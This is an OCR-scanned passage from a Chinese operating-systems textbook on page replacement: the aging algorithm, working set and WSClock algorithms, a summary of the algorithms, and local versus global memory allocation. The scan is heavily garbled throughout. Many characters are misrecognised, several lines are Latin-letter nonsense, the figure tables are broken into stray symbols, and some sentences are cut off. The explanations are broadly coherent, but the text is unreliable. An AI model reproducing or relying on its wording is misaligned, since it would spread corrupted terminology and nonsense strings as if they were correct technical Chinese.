NFU 的 主要 问题 是 它 从 来 不 忘记 任何 事情 。 比 如 ， 在 一 个 多 次 
(扫描 ) 编译 器 中 ， 在 第 一 次 扫描 中 被 频繁 使 用 的 页 面 在 程序 进入 第 
二 次 扫描 时 ， 其 计数 器 的 值 可 能 仍然 很 高 。 实 际 上 ， 如 采 第 一 次 扫描 
的 执行 时 间 恰 好 是 各 次 要 搞 中 最 长 的 ， 人 台 有 以 后 各 次 扫 摘 代码 的 页 面 
的 计数 万 可 能 总 是 比 舍 有 第 一 次 扫 摘 代码 的 页 面 小 ， 结 果 生 操作 系统 
将 置换 有 用 的 页 面 而 不 是 不 再 使 用 的 页 面 。 


幸运 的 是 只 需 对 NFU 做 一 个 小 小 的 修改 就 能 使 它 很 好 地 模拟 
LRU。 其 修改 分 为 两 部 分 ， 首 先 ， 在 R 位 被 加 进 之 前 先 将 计数 器 右 移 一 


位 ; 其 次 ， 将 R 位 加 到 计数 需 最 左 问 的 位 而 不 是 最 右 端 的 位 。 


修改 以 后 的 算法 称 为 老化 (aging) 算法 ， 图 3-18 解 释 了 它 是 如 何 
工作 的 。 假 设 在 第 一 个 时 钟 滴答 后 ， 页 面 0 到 页 面 5 的 R 位 值 分 别 是 1、 
页 面 0 为 1， 页 面 1 为 0， 页 面 2 为 1， 以 此 类 推 )。 换 
话说 ， 在 时 钟 滴答 0 到 时 钟 滴答 1 期 间 ， 访 问 了 页 0、2、4、5， 它 们 的 R 
位 设置 为 1， 而 其 他 页 面 的 R 位 仍然 是 0。 对 应 的 6 个 计数 器 在 经 过 移 位 
并 把 R 位 插入 其 左 端 后 的 值 如 图 3-18a 所 示 。 图 中 后 面 的 4 列 是 在 下 4 个 
时 钟 滴答 后 的 6 个 计数 器 的 值 。 


s™ 


日 于 


ay 


TMO~SIIRDL, :页面 0~-$ 的 R 位 ， 
时 钟 滴答 1 时 钟 滴答 2 


页 面 0~5 的 R 位 ， 
时 钟 滴 答 0 


页 面 0~5$ 的 R 位 ， 
时 钟 滴答 3 


页 面 0~$ 的 R 位 ， 
时 钟 滴答 4 


Sk 


1 1 1 
I 1 1 
I 1 1 
1 1 
ll 1 1 
| I | | 
上 I 1 1 
! I 1 1 
ol Do : [fs fofsfofs] yb po 

! I 1 1 
页 面 
I 1 I 

0} 10000000 |: | 11000000 |:| 11100000 |:| 11110000 |:| 01111000 
[j t 1 上 
I I 1 I 

1| 00000000 10000000 |: 11000000 01100000 10110000 
上 I 1 I 
I 1 1 I 

2| 10000000 01000000 ! 00100000 ' 00100000 ' 10001000 
1 1 1 I 
I ' 1 I 

3| 00000000 00000000 i 10000000 01000000 00100000 
! 1 1 I 
I 1 i I 

4| 10000000 | | 11000000 |; | 01100000 | | 10110000 | | | 01011000 
I 1 1 I 
I 1 1 I 
[j 1 1 

5| 10000000 |!| 01000000 | |! 10100000 |! | 01010000 |! | 00101000 
I 1 1 

a) b) c) d) e) 


Al 3-18 用 软件 模拟 LRU 的 老化 算法 。 图 中 所 示 是 6 个 页 面 在 5 个 时 钟 
滴答 的 情况 ，5 个 时 钟 滴答 分 别 由 a~e 表 示 


发 生 缺 页 中 断 时 ， 将 置换 计数 需 值 最 小 的 页 面 。 如 有 宁 一 个 页 面 在 
前 面 4 个 时 钟 滴 管 中 都 没有 访问 过 ， 那 么 它 的 计数 器 最 前 面 应 该 有 4 个 


连续 的 0， 因 此 它 的 值 肯定 要 比 在 前 面 三 个 时 钟 滴答 中 都 没有 被 访问 过 
的 页 面 的 计数 器 值 小 。 


该 算法 与 LRU 有 两 个 区 别 。 如 图 3-18e 中 的 页 面 3 和 页 面 5， 它 们 都 
连续 两 个 时 钟 滴 答 没 有 被 访问 过 了 ， 而 在 两 个 时 钟 滴答 之 前 的 时 钟 滴 
答 中 它们 都 被 访问 过 。 根 据 LRU， 如 果 必 须 置 换 一 个 页 面 ， 则 应 该 在 
这 两 个 页 面 中 选择 一 个 。 然 而 现在 的 问题 是 ， 我 们 不 知道 在 时 钟 滴答 1 
到 时 钟 滴答 2 期 间 它 们 中 的 哪 一 个 页 面 是 后 被 访问 到 的 。 因 为 在 每 个 时 
钟 滴 管 中 只 记录 了 一 位 ， 所 以 无 法 区 分 在 一 个 时 钟 滴答 中 哪个 页 面 在 
较 早 的 时 间 被 访问 以 及 哪个 页 面 在 较 晚 的 时 间 被 访问 ， 因 此 ， 我 们 所 
能 做 的 就 是 置换 页 面 3， 原 因 是 页 面 5 在 更 往 前 的 两 个 时 钟 滴 答 中 也 被 
访问 过 而 页 面 3 没有 。 


LRU 和 老化 算法 的 第 二 个 区 别 十 老化 算法 的 计数 右 只 有 有 限 位 数 
(本 例 中 是 8 位 ) ， 这 就 限制 了 其 对 以 往 页 面 的 记录 。 如 果 两 个 页 面 的 
计数 需 都 症 0， 我 们 只 能 在 两 个 页 面 中 随机 选 一 个 进行 置换 。 实 际 上 ，， 
有 可 能 其 中 一 个 页 面 上 次 被 访问 是 在 9 个 时 钟 滴答 以 前 ， 另 一 个 页 面 是 
在 1000 个 时 钟 滴答 以 前 ， 而 我 们 却 无 法 看 到 这 些 。 在 实践 中 ， 如 果 时 
钟 滴答 是 20ms，8 位 一 般 是 够 用 的 。 假 如 一 个 页 面 已 经 有 160ms 没 有 被 
访问 过 ， 那 么 它 很 可 能 并 不 重要 ° 


3.4.8 工作 集 页 面 置换 算法 


在 单纯 的 分 页 系统 里 ， 刚 局 动 进程 时 ， 在 内 存 中 并 没有 页 面 。 在 
CPU 试图 取 第 一 条 指令 时 就 会 产生 一 次 缺 页 中 断 ， 使 操作 系统 装 入 合 
有 第 一 条 指令 的 页 面 。 其 他 由 访问 全 局 数据 和 堆栈 引起 的 缺 页 中 断 通 
常会 紧 接 着 发 生 。 一 段 时 间 以 后 ， 进 程 需要 的 大 部 分 页 面 都 已 经 在 内 
存 了 ， 进 程 开 始 在 较 少 缺 页 中 断 的 情况 下 运行 。 这 个 蛇 略 称 为 请 求 调 
页 (demand paging) ， 因 为 页 面 是 在 需要 时 被 调 入 的 ， 而 不 是 预先 装 
入 。 


编写 一 个 测试 程序 很 容易 ， 在 一 个 大 的 地 址 空间 中 系统 地 读 所 有 
的 页 面 ， 将 出 现 大 量 的 缺 页 中 断 ， 因 此 会 导致 没有 足够 的 内 存 来 容纳 
这 些 页面 。 不 过 幸运 的 是 ， 大 部 分 进程 不 是 这 样 工 作 的 ， 它 们 都 表现 
出 了 一 种 局 部 性 访问 行为 ， 即 在 进程 运行 的 任何 阶段 ， 它 都 只 访问 较 
少 的 一 部 分 页 面 。 例 如 ， 在 一 个 多 次 扫 摘 编译 做 中 ， 各 次 扫 朱 时 只 访 
问 所 有 页 面 中 的 一 小 部 分 ， 并 且 有 是 不 同 的 部 分 。 


一 个 进程 当前 正在 使 用 的 页 面 的 集合 称 为 它 的 工作 集 (working 
set) (Denning, 1968a; Denning, 1980) 。 如 果 整 个 工作 集 都 被 装 入 
到 了 内 存 中 ， 那 么 进程 在 运行 到 下 一 运行 阶段 〈 例 如， 编译 器 的 下 一 
HAHH) 之 前 ， 不 会 产生 很 多 缺 页 中 断 。 者 内 存 太 小 而 无 法 容纳 下 整 
个 工作 集 ， 那 么 进程 的 运行 过 程 中 会 产生 大 量 的 缺 页 中 断 ， 导 致 运行 


速度 也 会 变 得 很 缓慢 ， 因 为 通常 只 需要 几 个 纳 秒 就 能 执行 完 一 条 指 

令 ， 而 通常 需要 十 宣 秒 才能 从 磁盘 上 读 入 一 个 页 面 。 如 果 一 个 程序 每 
10ms 只 能 执行 一 到 两 条 指令 ， 那 么 它 将 会 需要 很 长 时 间 才 能 运行 完 。 
若 每 执行 儿 条 指令 程序 就 发 生 一 次 缺 页 中 断 ， 那 么 就 称 这 个 程序 发 生 
TÄN: (thrashing) (Denning, 1968b) ° 


在 多 道 程序 设计 系统 中 ， 经 常会 把 进程 转移 到 磁盘 上 ( 即 从 内 存 
中 移 走 所 有 的 页 面 ) ， 这 样 可 以 让 其 他 的 进程 有 机 会 占有 CPU“。 有 一 
个 问题 是 ， 当 该 进程 再 次 调 回 来 以 后 应 该 怎样 办 ? 从 技术 的 角度 上 
讲 ， 并 不 需要 做 什么 。 该 进程 会 一 直 产 生 缺 页 中 断 直 到 它 的 工作 集 全 
部 被 装 入 内 存 。 然 而 ， 每 次 装 入 一 个 进程 时 都 要 产生 20、100 甚 至 1000 
次 缺 页 中 断 ， 速 度 显 然 太 慢 了 ， 并 且 由 于 CPU 需要 几 毫 秒 时 间 处 理 一 
个 缺 页 中 断 ， 因 此 有 相当 多 的 CPU 时 间 也 被 浪费 了 。 


所 以 不 少 分 页 系统 都 会 设法 跟踪 进程 的 工作 集 ， 以 确保 在 让 进程 
运行 以 前 ， 它 的 工作 集 就 已 在 内 存 中 了 “。 该 方法 称 为 工作 集 模 型 
(working set model) (Denning, 1970) ， 其 目的 在 于 大 大 减少 缺 页 
中 断 率 。 在 让 进程 运行 前 预先 装 入 其 工作 集 页 面 也 称 为 预先 调 页 
(prepaging) 。 请 注意 工作 集 是 随 着 时 间 变 化 的 。 


人 们 很 早 就 发 现 大 多 数 程序 都 不 是 均匀 地 访问 它们 的 地 址 空间 
的 ， 而 访问 往往 是 集中 于 一 小 部 分 页 面 。 一 次 内 存 访 问 可 能 会 取出 一 
条 指令 ， 也 可 能 会 取 数 据 ， 或 者 生存 储 数据 。 在 任 一 时 刻 t， 都 存在 一 


个 集合 ， 它 包含 所 有 最 近 k 次 内 存 访问 所 访问 过 的 页 面 。 这 个 集合 
wdeb 束 是 工作 集 。 因 为 最 近 k=1 次 访问 肯定 会 访问 最 近 k> 1 次 访问 所 
访问 过 的 页 面 ， 所 以 w(K 是 k 的 单调 非 递 减 钞 数 。 随 着 k 的 变 大 ，w(k,t) 
征 不 会 无 限 变 大 的 ， 因 为 程序 不 可 能 访问 比 它 的 地 址 空间 所 能 容纳 的 
页 面 数 目 上 限 还 多 的 页 面 ， 并 且 几 乎 没有 程序 会 使 用 每 个 页 面 。 图 3-19 
fae SPAKE ESB TERIAK ° 
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k 


A 3-19 工作 集 是 最 近 k 次 内 存 访问 所 访问 过 的 页 面 的 集合 ， 函 数 
web 是 在 时 刻 时 工作 集 的 天 小 


事实 上 大 多 数 程序 会 任意 访问 一 小 部 分 页 面 ， 但 是 这 个 集合 会 随 
着 时 间 而 缓慢 变化 ， 这 个 事实 也 解释 了 为 什么 一 开始 曲线 快速 地 上 升 
而 k 较 大 时 上 升 会 变 慢 。 举 例 来 说， 某 个 程序 执行 占用 了 两 个 页 面 的 循 
环 ， 并 使 用 四 个 页 面 上 的 数据 ， 那 么 可 能 每 执行 1000 条 指令 ， 它 就 会 
访问 这 六 个 页 面 一 次 ， 但 是 最 近 的 对 其 他 页 面 的 访问 可 能 是 在 100 万 条 
指令 以 前 的 初始 化 阶段 。 因为 这 是 个 渐进 的 过 程 ，k 值 的 选择 对 工作 集 


的 内 容 影响 不 大 。 换 人 句 话 说 ，k 的 值 有 一 个 很 大 的 范围 ， 它 处 在 这 个 范 
围 中 时 工作 集 不 会 变 。 因 为 工作 集 随 时 间 变 化 很 慢 ， 那 么 当 程 序 重 新 
开始 时 ， 就 有 可 能 根据 它 上 次 结束 时 的 工作 集 对 要 用 到 的 页 面 做 一 个 
合理 的 推测 ， 预 先 调 页 就 是 在 程序 继续 运行 之 前 预先 装 入 推测 出 的 工 
作 集 的 页 面 。 


为 了 实现 工作 集 模型 ， 操 作 系统 必须 跟踪 哪些 页 面 在 工作 集中 。 
通过 这 些 信息 可 以 直接 推导 出 一 个 合理 的 页 面 置换 算法 : 当 发 生 缺 页 
中 断 时 ， 淘 汰 一 个 不 在 工作 集中 的 页 面 。 为 了 实现 该 算法 ， 束 需要 一 
种 精确 的 方法 来 确定 哪些 页 面 在 工作 集中 。 根 据 定义 ， 工 作 集 束 古 最 
近 k 次 内 存 访问 所 使 用 过 的 页 面 的 集合 (有 些 设计 者 使 用 最 近 k 次 页 面 
访问 ， 但 是 选择 是 任意 的 ) 。 为 了 实现 工作 集 算 法 ， 必 须 预 先 选 定 k 的 
值 。 一 旦 选 定 某 个 值 ， 每 次 内 存 访问 之 后 ， 最 近 k 次 内 存 访问 所 使 用 过 
的 页 面 的 集合 就 古 惟 一 确定 的 了 。 


当然 ， 有 了 工作 集 的 定义 并 不 意味 着 存在 一 种 有 效 的 方法 能 够 在 
程序 运行 期 间 及 时 地 计算 出 工作 集 。 设 想 有 一 个 长 度 为 k 的 移 位 寄存 
硕 ， 每 进行 一 次 内 存 访问 束 把 寄存 絮 左 移 一 位 ， 然 后 在 最 右 端 插入 刚 
才 所 访问 过 的 页 面 号 。 移 位 寄存 天 中 的 k 个 页 面 号 的 集合 吏 是 工作 集 。 
理论 上 ， 当 缺 页 中 断 发 生 时 ， 只 要 读 出 移 位 寄存 器 中 的 内 容 并 排序 
然后 删除 重复 的 页 面 。 结 采 融 是 工作 集 。 然 而 ， 维 护 移 位 寄存 郁 并 在 
缺 页 中 断 时 处 理 它 所 需 的 开销 很 大 ， 因 此 该 技术 从 来 没有 被 使 用 过 。 
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征 ， 不 是 向 后 找 最 近 k 次 的 内 存 访 问 ， 而 是 考虑 其 执行 时 间 。 例 如 ， 按 
照 以 前 的 方法 ， 我 们 定义 工作 集 为 前 1000 万 次 内 存 访问 所 使 用 过 的 页 
面 的 集合 ， 那 么 现在 天 可 以 这 样 定 义 : 工作 集 即 是 过 去 10ms 中 的 内 存 
访问 所 用 到 的 页 面 的 集合 。 实 际 上 ， 这 样 的 模型 很 合适 且 更 容易 实 
现 。 要 注意 到 ， 每 个 进程 只 计算 它 上 自己 的 执行 时 间 。 因 此 ， 如 果 一 个 
进程 在 T 时 刻 开始 ， 在 (T+100) ms 的 时 刻 使 用 了 40ms CPU 时 间 ， 对 工 
作 集 而 言 ， 它 的 时 间 就 是 40ms。 一 个 进程 从 它 开始 执行 到 当前 所 实际 
使 用 的 CPU 时 间 总 数 通 稼 称 作 当前 实际 运行 时 间 。 通 过 这 个 近似 的 方 
法 ， 进 程 的 工作 集 可 以 被 称 为 在 过 去 的 t 秒 实际 运行 时 间 中 它 所 访问 过 
的 页 面 的 集合 。 


现在 让 我 们 来 看 一 下 基于 工作 集 的 页 面 置 换算 法 。 基 本 思路 就 是 
找 出 一 个 不 在 工作 集中 的 页 面 并 淘汰 它 。 在 图 3-20 中 读者 可 以 看 到 某 台 
机 器 的 部 分 页 表 。 因 为 只 有 那些 在 内 存 中 的 页 面 才 可 以 作为 候选 者 被 
淘汰 ， 所 以 该 算法 忽略 了 那些 不 在 内 存 中 的 页 面 。 每 个 表 项 至 少 包 含 
两 条 信息 : 上 次 使 用 该 页 面 的 近似 时 间 和 R (访问 ) 位 。 空 白 的 矩形 表 
示 该 算法 不 需要 的 其 他 域 ， 如 页 框 号 、 保 护 位 、M (修改 ) 位 。 


2204 当前 实际 时 间 
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2084 
[| 
2003 l1 
[| 
1980 |1] 
| 


一 个 页 面 的 信息 | R (访问 ) 位 


上 次 使 用 的 时 间 


扫描 所 有 页 面 检查 R 位 : 


这 个 时 钟 滴答 _ e TO el 
i | 设置 上 次 使 用 时 间 为 当前 实际 时 间 
其 页 而 
期 间 访 问 的 页 面 人 其 《R=-0 目 生存 时 间 六 1 
移出 这 个 页 面 
aaa, 车 (R==0 且 生存 时 间 志 7?) 
这 个 时 钟 滴答 其 记 住 最 小 时 间 


| 
1620 |0] 


页 表 


间 未 访问 的 页 面 


图 3-20 工作 集 算 法 


该 算法 工作 方式 如 下 。 如 前 所 述 ， 假 定 使 用 硬件 来 置 R 位 和 M 位 。 
同样 ， 假 定 在 每 个 时 钾 滴 答 中 ， 有 一 个 定期 的 时 钟 中 断 会 用 软件 方法 
来 清除 R 位 。 每 当 缺 页 中 断 发 生 时 ， 扫 摘 页 表 以 找 出 一 个 合适 的 页 面 淘 
KZ ° 


在 处 理 每 个 表 项 时 ， 都 需要 检查 R 位 。 如 果 它 是 1， 就 把 当前 实际 
时 间 写 进 页 表 项 的 “< 上 次 使 用 时 间 *” 域 ， 以 表示 矶 页 中 断 发 生 时 该 页 面 
正在 被 使 用 。 既 然 该 页 面 在 当前 时 钟 滴答 中 已 经 被 访问 过 ， 那 么 很 明 
显 它 应 该 出 现在 工作 集中 ， 并 且 不 应 该 被 删除 〈 假 定 t 横 跨 多 个 时 钟 滴 
全 


如 果 R 是 0， 那 么 表示 在 当前 时 钟 滴答 中 ， 该 页 面 还 没有 被 访问 
过 ， 则 它 束 可 以 作为 候选 者 被 置换 。 为 了 知道 它 是 否 应 该 被 置换 ， 需 
要 计算 它 的 生存 时 间 ( 即 当 前 实际 运行 时 间 减 去 上 次 使 用 时 间 ) ， 然 
后 与 做 比较 。 如 果 它 的 生存 时 间 大 于 t， 那 么 这 个 页 面 束 不 再 在 工作 集 
中 ， 而 用 新 的 页 面 置 换 它 。 扫 摘 会 继续 进行 以 更 新 剩余 的 表 项 。 


然而 ， 如 果 R 是 0 同时 生存 时 间 小 于 或 等 于 t， 则 该 页 面 仍然 在 工作 
集中 。 这 样 束 要 把 该 页 面临 时 人 留 下 来 ,但 是 要 记 杂 生存 时 间 最 长 
(“上 次 使 用 时 间 ” 的 最 小 值 ) 的 页 面 。 如 果 扫 描 完 整个 页 表 却 没有 找 
到 适合 被 淘汰 的 页 面 ， 也 就 意味 着 所 有 的 页 面 都 在 工作 集中 。 在 这 种 
情况 下 ， 如 宁 找 到 了 一 个 或 者 多 个 R=0 的 页 面 ， 束 淘汰 生存 时 间 最 长 的 
页 面 。 在 最 坏 情况 下 ， 在 当前 时 间 滴 答 中 ， 所 有 的 页 面 都 被 访问 过 了 
(也 就 是 都 有 R=1) ， 因 此 就 随机 选择 一 个 页 面 淘汰 ， 如 果 有 的 话 最 好 
选 一 个 干净 页 面 。 


3.49 ”工作 集 时 钟 页 面 置换 算法 


当 缺 页 中 断 发 生 后 ， 需 要 扫描 整个 页 表 才 能 确定 被 淘汰 的 页 面 ， 
因此 基本 工作 集 算 法 是 比较 费时 的 。 有 一 种 改进 的 算法 ， 它 基于 时 钟 
算法 ， 并 且 使 用 了 工作 集 信 息 ， 称 为 WSClock 〈 工 作 集 时 钟 ) 算法 
(Carr 和 Hennessey，1981) 。 由 于 它 实现 简单 ， 性 能 较 好 ， 所 以 在 实 
际 工作 中 得 到 了 广泛 应 用 。 


与 时 钟 算法 一 样 ， 所 需 的 数据 结构 是 一 个 以 页 框 为 元 素 的 循环 
表 ， 参 见 图 3-21a。 最 初 ， 该 表 是 空 的 。 当 装 入 第 一 个 页 面 后 ， 把 它 加 
到 该 表 中 。 随 着 更 多 的 页 面 的 加 入 ， 它 们 形成 一 个 环 。 每 个 表 项 包含 
来 日 基本 工作 集 算法 的 上 次 使 用 时 间 ， 以 及 R 位 (已 标明 ) 和 M 位 (未 
标明 ) 。 
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Al 3-21 工作 集 时 钟 页 面 置 换算 法 的 操作 a) 和 b) 给 出 在 R=1 时 所 发 
生 的 情形 ; c) 和 qd) 给 出 R=0 的 例子 


与 时 钟 算法 一 样 ， 每 次 缺 页 中 断 时 ， 首 先 检 查 指针 指向 的 页 面 。 
如 采 R 位 被 置 为 1， 该 页 面 在 当前 时 钟 滴 管 中 就 被 使 用 过 ， 那 么 该 页 面 


束 不 适合 被 淘汰 。 人 然后 把 该 页 面 的 R 位 置 为 0， 指 针 指 癌 下 一 个 页 面 ， 
并 重复 该 算法 。 该 事件 序列 之 后 的 状态 参见 图 3-21b。 


现在 来 考虑 指针 指向 的 页 面 在 R=0 时 会 发 生 什么， 参见 图 3-21c » 
QUART AE BY FHR MEEN, ERNE LES, 
并 且 在 磁盘 上 有 一 个 有 效 的 副本 。 申 请 此 页 框 ， 并 把 新 页 面 放 在 其 
中 ， 如 图 3-21d 所 示 。 男 一 方面 ， 如 果 此 页 面 被 修改 过 ， 就 不 能 立即 申 
请 页 框 ， 因 为 这 个 页 面 在 磁 到 上 没有 有 效 的 副本 。 为 了 避免 由 于 调度 
写 磁盘 操作 引起 的 进程 切换 ， 指 针 继 续 向 前 走 ， 算 法 继续 对 下 一 个 页 
面 进行 操作 。 上 毕竟， 有 可 能 存在 一 个 旧 的 且 干 净 的 页 面 可 以 立即 使 
用 。 


原则 上 ， 所 有 的 页 面 都 有 可 能 因为 磁 副 1/O 在 某 个 时 钟 周期 被 调 
度 。 为 了 降低 磁盘 阻塞 ， 需 要 设置 一 个 限制 ， 即 最 大 只 人 允许 写 回 n 个 页 
面 。 一 旦 达到 该 限制 ， 就 不 允许 调度 新 的 写 操 作 。 


如 琳 指 针 经 过 一 圈 返 回 它 的 起 始点 会 发 生 什么 呢 ? 这 里 有 两 种 情 


1) 至 少 调度 了 一 次 写 操作 。 


2) 没 有 调度 过 写 操作 。 


对 于 第 一 种 情况 ， 指 针 仅仅 是 不 停 地 移动 ， 寻 找 一 个 干净 页 面 。 
既然 已 经 调度 了 一 个 或 者 多 个 写 操作 ， 最 终 会 有 某 个 写 操作 完成 ， 它 
的 页 面 会 被 标记 为 干净 。 苇 换 遇 到 的 第 一 个 干 疤 页 面 ， 这 个 页 面 不 一 
定 是 第 一 个 被 调度 写 操作 的 页 面 ， 因 为 硬盘 驱动 程序 为 了 优化 性 能 

己 经 把 写 操作 重 排序 了 。 


对 于 第 二 种 情况 ， 所 有 的 页 面 都 在 工作 和 集中， 否则 将 至 少 调度 了 
一 个 写 操作 。 由 于 缺乏 额外 的 信息 ， 一 个 简单 的 方法 束 是 随便 置换 一 
个 干净 的 页 面 来 使 用 ， 扫 描 中 需要 记录 干净 页 面 的 位 置 。 如 果 不 存在 
干净 页 面 ， 丈 先是 当前 页 面 并 把 它 写 回 人 磁盘。 


3.4.10 ”页 面 置换 算法 小 结 


我 们 已 经 考察 了 多 种 页 面 置 换算 法 ， 本 市 将 对 这 些 算法 进行 总 
结 。 已 经 讨论 过 的 算法 在 图 3-22 中 列 出 。 


注 有 释 ee 
不 可 实现 ， 但 可 用 作 基 准 
LRU 的 很 粗糙 的 近似 
可 能 抛弃 重要 页 面 
比 FIFO 有 大 的 改善 
_ 时钟 算法 | 现实 的 
很 优秀 ， 但 很 难 实现 
NFU (最 不 经 常 使 用 ) 算法 LRU 的 相对 粗略 的 近似 


老化 算法 非常 近似 LRU 的 有 效 算法 


最 优 算 法 
NRU (最 近 未 使 用 ) 算法 
FIFO〈 先 进 先 出 ) 算法 


第 二 次 机 会 算法 


工作 集 算法 实现 起 来 开销 很 大 
工作 集 时 钟 算法 好 的 有 效 算法 


图 3-22 书 中 讨论 过 的 页 面 置 换算 法 


最 优 算法 在 当前 页 面 中 置换 最 后 要 访问 到 的 页 面 。 不 笠 的 是 ， 没 
有 办 法 来 判定 哪个 页 面 是 最 后 一 个 要 访问 的 ， 因 此 实际 上 该 算法 不 能 
使 用 。 然 而 ， 它 可 以 作为 衡量 其 他 算法 的 基准 。 


NRU 算 法 根据 R 位 和 M 位 的 状态 把 页 面 分 为 四 类 。 从 编号 最 小 的 类 
中 随机 选择 一 个 页 面 置换 。 该 算法 易于 实现 ， 但 是 性 能 不 是 很 好 ， 还 
存在 更 好 的 算法 。 


FIFO 算 法 通过 维护 一 个 页 面 的 链表 来 记录 它们 装 入 内 存 的 顺序 。 
淘汰 的 是 最 老 的 页 面 ， 但 是 该 页 面 可 能 仍 在 使 用 ， 因 此 FIFO 算 法 不 是 
= 


第 二 次 机 会 算法 是 对 FIFO 算 法 的 改进 ， 它 在 移出 页 面前 先 检查 该 
页 面 是 否 正 在 被 使 用 。 如 果 该 页 面 正在 被 使 用 ， 束 保留 该 页 面 。 这 个 
改进 大 大 提高 了 性 能 。 时 钟 算法 是 第 二 次 机 会 算法 的 另 一 种 实现 。 它 
具有 相同 的 性 能 特征 ， 而 且 只 需要 更 少 的 执行 时 间 。 


LRU 算 法 古 一 种 非 第 优秀 的 算法 ,但 是 只 能 通过 特定 的 人 硬件 来 实 
现 。 如 有 果 机 万 中 没有 该 硬件 ， 那 么 也 无 法 使 用 该 算法 。NEFU 是 一 种 近 
似 于 LRU 的 算法 ， 它 的 性 能 不 是 非常 好 ， 然 而 ， 老 化 算法 更 近似 于 
LRU 并 且 可 以 更 有 效 地 实现 ， 是 一 个 很 好 的 选择 。 


最 后 两 种 算法 都 使 用 了 工作 集 。 工 作 集 算法 有 合理 的 性 能 ， 但 它 
的 实现 开销 较 大 。 工 作 集 时 钟 算法 是 它 的 一 种 变 体 ， 不 仅 具 有 民 好 的 
性 能 ， 并 且 还 能 高 效 地 实现 。 


总 之 ， 最 好 的 两 种 算法 是 老化 算法 和 工作 集 时 钟 算法 ， 它 们 分 别 
基于 LRU 和 工作 集 。 它 们 都 具有 良好 的 页 面 调度 性 能 ， 可 以 有 效 地 实 
现 。 也 存在 其 他 一 些 算法 ， 但 在 实际 应 用 中 ， 这 两 种 算法 可 能 十 最 重 
BEN 


3.5 分 页 系统 中 的 设计 问题 


在 前 儿 市 里 我 们 讨论 了 分 页 系统 是 如 何 工作 的 ， 并 给 出 了 一 些 基 
本 的 页 面 置 换算 法 和 如 何 实 现 它 们 。 然 而 只 了 解 基本 机 制 是 不 够 的 。 
要 设计 一 个 系统 ， 必 须 了 解 得 更 多 才能 使 系统 工作 得 更 好 。 这 两 首 之 
间 的 差别 束 像 知道 了 起 样 移动 象棋 的 各 种 棋子 与 成 为 一 个 好 棋 手 之 间 
的 老 别 。 下 面 我 们 将 讨论 为 了 使 分 页 系统 达到 较 好 的 性 能 ， 操 作 系 统 
设计 着 必须 仔细 考虑 的 一 些 其 他 问题 。 


3.5.1 局 部 分 配 案 略 与 全 局 分 配 案 上 略 


在 前 几 节 中 ， 我 们 讨论 了 在 发 生 缺 页 中 断 时 用 来 选择 一 个 被 置换 
页 面 的 几 个 算法 。 与 这 个 选择 相关 的 一 个 主要 问题 (到 目前 为 止 我 们 
一 直 在 小 心地 回避 这 个 问题 ) 是 ， 怎 样 在 相互 竞争 的 可 运行 进程 之 间 
分 配 内 存 。 


如 图 3-23a 所 示 ， 三 个 进程 A、B、C 构 成 了 可 运行 进程 的 集合 。 假 
如 A 发 生 了 缺 页 中 断 ， 页 面 置 换算 法 在 寻找 最 近 最 少 使 用 的 页 面 时 征 只 
考虑 分 配给 A 的 6 个 页 面 呢 ? 还 是 考虑 所 有 在 内 存 中 的 页 面 ? 如 条 只 考 
虚 分 配给 A 的 页 面 ， 生 存 时 间 值 最 小 的 页 面 是 A5， 于 是 将 得 到 图 3-23b 
所 示 的 状态 。 


生存 时 间 
0 


人 


图 3-23 局 部 页 面 置 换 与 全 局 页 面 置换 a) 最 初 配置 ，b) 局 部 页 面 置 
换 ， 全 局 页 面 置 换 


另 一 方面 ， 如 果 淘 汰 内 存 中 生存 时 间 值 最 小 的 页 面 ， 而 不 管 它 属 
于 哪个 进程 ， 则 将 选中 页 面 B3， 于 是 将 得 到 图 3-23c 所 示 的 情况 。 图 3- 
23b 的 算法 被 称 为 局 部 (local) 页 面 置 换算 法 ， 而 图 3-23c 被 称 为 全 局 
(global) 页 面 置换 算法 。 局 部 算法 可 以 有 效 地 为 每 个 进程 分 配 固定 的 
内 存 片 段 。 全 局 算法 在 可 运行 进程 之 间 动 态 地 分 配 页 框 ， 因 此 分 配给 
各 个 进程 的 页 框 数 是 随时 间 变 化 的 。 


全 局 算法 在 通常 情况 下 工作 得 比 局 部 算法 好 ， 当 工作 集 的 大 小 随 
进程 运行 时 间 发 生变 化 时 这 种 现象 更 加 明显 。 帮 使 用 局 部 算法 ， 即 使 
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小 了 ， 局 部 算法 又 会 浪费 内 存 。 在 使 用 全 局 算法 时 ， 系 统 必 须 不 停 地 
确定 应 该 给 每 个 进程 分 配 多 少 页 框 。 一 种 方法 是 监测 工作 集 的 大 小 ， 
工作 集 大 小 由 “老化 ”位 指出 ， 但 这 个 方法 并 不 能 防止 颠 艇 。 因 为 工作 
集 的 大 小 可 能 在 几 微 秒 内 就 会 发 生 改 变 ， 而 老化 位 却 要 经 历 一 定 的 时 
钟 滴答 数 才 会 发 生变 化 。 


男 一 种 途径 是 使 用 一 个 为 进程 分 配 页 框 的 算法 。 其 中 一 种 方法 是 
定期 确定 进程 运行 的 数目 并 为 它们 分 配 相 等 的 份额 。 例如， 在 有 12 416 
个 有 效 ( 即 未 被 操作 系统 使 用 的 ) 页 框 和 10 个 进程 时 ， 每 个 进程 将 获 
得 1241 个 页 框 ， 剩 下 的 6 个 被 放 入 到 一 个 公用 池 中 ， 当 发 生 缺 页 中 断 时 
可 以 使 用 这 些 页 面 。 


这 个 算法 看 起 来 好 像 很 公平 ， 但 二 给 一 个 10KB 的 进程 和 一 个 
300KB 的 进程 分 配 同 样 大 小 的 内 存 块 古 很 不 合理 的 。 可 以 采用 按照 进 
程 大 小 的 比例 来 为 它们 分 配 相 应 数目 的 页 面 的 方法 来 取代 上 一 种 方 
法 ， 这 样 300KB 的 进程 将 得 到 10KB 进 程 30 倍 的 份额 。 比 较 明 吞 的 一 个 
可 行 的 做 法 是 对 每 个 进程 都 规定 一 个 最 小 的 页 框 数 ， 这 样 不 论 多 么 小 
的 进程 都 可 以 运行 。 例 如 ， 在 某 些 机 絮 上 ， 一 条 两 个 操作 数 的 指令 会 
需要 多 达 6 个 页 面 ， 因 为 指令 上 自身 、 源 操作 数 和 目的 操作 数 可 能 会 跨越 
页 面 边 界 ， 知 只 给 一 条 这 样 的 指令 分 配 了 5 个 页 面 ， 则 包 侣 这 样 的 指令 
的 程序 根本 无 法 运行 。 


如 果 使 用 全 局 算法 ， 根 据 进程 的 大 小 按 比例 为 其 分 配 页 面 也 是 可 
能 的 ， 但 是 该 分 配 必须 在 程序 运行 时 动态 更 新 。 管 理 内 存 动态 分 配 的 
一 种 方法 是 使 用 PFF (Page Fault Frequency, $PR) 算法 。 它 指 
